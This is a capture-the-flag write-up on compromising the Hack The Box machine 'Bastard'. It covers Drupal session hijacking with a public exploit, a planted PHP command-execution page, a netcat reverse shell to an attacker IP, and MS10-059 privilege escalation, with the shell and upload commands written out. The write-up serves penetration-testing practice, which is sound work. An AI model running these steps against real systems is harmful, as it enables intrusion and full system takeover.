Hack The Box — Bastard — without Metasploit (TJNull’s list for OSCP)
This is my 27th write-up for Bastard, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -Pn -oA nmap/initial bastard.htb
Only one port is open, that I am familiar with, that is HTTP on port 80. Rest are MSRPC. So, let’s run a full Nmap scan.
nmap -sC -sV -O -Pn -p- -oA nmap/allports bastard.htbBut it also reveals the same results. So, let’s start by enumerating HTTP server.
Hmm… It’s running Drupal CMS. I checked admin:admin, admin:password but none of that worked. So, let’s check robots.txt.
Here, we have a disallowed entry, that is /CHANGELOG.txt. So, let’s check that, because it usually reveals the version whenever the versions are updated.
Here, we can see that the last update was from Drupal 7.53 to Drupal 7.54.
Now, we have a version number, and the system was updated on 2017–02–01. That seems pretty old so, we may find public exploits easily.
Initial Foothold
A quick Google search for Drupal 7.54 Exploit gives us the following exploit.
https://www.exploit-db.com/exploits/41564
Looking into the code we can see,
That we need 2 things, URL and Rest Endpoint Path. We have the URL that is the target’s IP (that I have added in my /etc/hosts), but we don’t know the Rest Endpoint.
Let’s do a Google search.
And we get this article. By visiting it, we can see,
admin/config/services/rest
Let’s navigate to that.
Nope! That’s not it. By doing little trial and error I found out that it’s on /rest.
So, our Rest Endpoint is at /rest. Let’s edit the exploit code and run it using PHP.
(You may need to set the URL to the IP address if you have not configured your /etc/hosts file)
Let’s run the exploit. (My exploit filename is drupal.php)
php drupal.php
The exploit stored the session information in session.json and user information in user.json
(You may need to install php-curl if you are getting an error like “Uncaught Error: Call to undefined function curl_init()” just use sudo apt install php-crul)
Let’s see the user.json.
We have the username and the password hash. We can try cracking the hash, but we don’t need to do it, since it can take time and we have session information already stored in session.json
We can set these cookies using Cookie Manager plugin for firefox. You can install it from here, https://addons.mozilla.org/en-US/firefox/addon/a-cookie-manager/
Go to New Cookie on the bottom right.
Set Name to the value of session_name and Value to session_id value from the session.json. Click save on the bottom left.
Now refresh the target webserver.
And we are logged in as admin. Rest of the bit is easy.
Let’s go to Modules tab.
Make sure that PHP filter is checked.
Then Go to Add Content and select Basic Page.
Set the Title to anything, paste the code mentioned below, and make sure that Text format is set to PHP code, then scroll down and click save.
(I can not write this code in here for you to copy it, because when I did, I wasn’t able to save the post, maybe medium detected it as malicious.)
In the code above, we are basically creating something like two functions that we can call to upload files or execute commands. (You will need to replace the IP address with your IP address)
Our page has been created. Let’s try executing a command. (whoami)
And we are able to execute commands. I also created a functionality to upload files using fupload so, that I can upload netcat to the target and then use fexec to execute it to get a reverse shell.
Let’s copy the nc.exe to our attacking machine’s current working directory and host it using python http server.
locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .
Now, we can host this directory using python http server.
python3 -m http.server 80
Now upload it to the target using the fupload functionality.
And we got a hit on our python http server, this means that the target tried to fetch the file. Now, let’s start a listener and run the nc.exe using fexec functionality again to get a reverse shell.
http://bastard.htb/node/5?fexec=nc.exe 10.10.16.32 4242 -e cmd.exe
And we got a shell. But we are not nt authority\SYSTEM yet.
Privilege Escalation
Let’s grab the target System’s info using the systeminfo command.
systeminfo
Copy all this information and paste it into a file sysinfo.txt
We will use Windows Exploit Suggester. You can grab it from here
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Let’s update the exploit suggester
python2 windows-exploit-suggester.py --updateIt will create a database file in xls format.
Now let’s run the exploit suggester with the system info that we saved in our attacking machine along with the database that exploit suggester created after being updated.
python windows-exploit-suggester.py --database 2023-06-06-mssb.xls --systeminfo sysinfo.txt
I tried different exploits, but the one that worked for me was MS10–059. There’s a very good resource Windows Kernel Exploit.
https://github.com/SecWiki/windows-kernel-exploits/
Here, we have MS10–059 Directory.
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
We can grab the binary executable directly, so we wouldn’t need to compile it.
Since, we have our webserver running and we know that we can upload the files, using the same PHP script that we created; so let’s use that.
http://bastard.htb/node/5?fupload=MS10-059.exe
We got a hit on our python http server for the exploit.
Let’s check in our reverse shell, if the exploit has been uploaded.
And it has… Let’s run that.
It tells us how to use this exploit. It seems like it’s a reverse shell exploit. So let’s start a listener to capture the shell.
rlwrap nc -lvnp 8080
Now run the exploit with our attacking machine’s IP address and the port we are listening on (8080 in my case)
MS10-059.exe 10.10.16.32 8080
Let’s check the listener.
And we got NT AUTHORITY\SYSTEM (root) shell!
:)
